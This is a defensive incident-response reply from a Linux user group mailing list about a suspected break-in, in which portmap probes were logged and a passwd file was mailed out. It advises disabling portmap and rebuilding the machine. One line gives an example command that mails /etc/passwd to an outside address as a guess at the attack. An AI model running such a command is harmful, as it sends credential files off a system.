> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you running the portmapper? Turn it off if you don't specifically
need it.

A "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer overflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc. (or something like
that).

It could be anything. Either way, you know that something has
happened. Make an executive decision about whether it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.



-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug
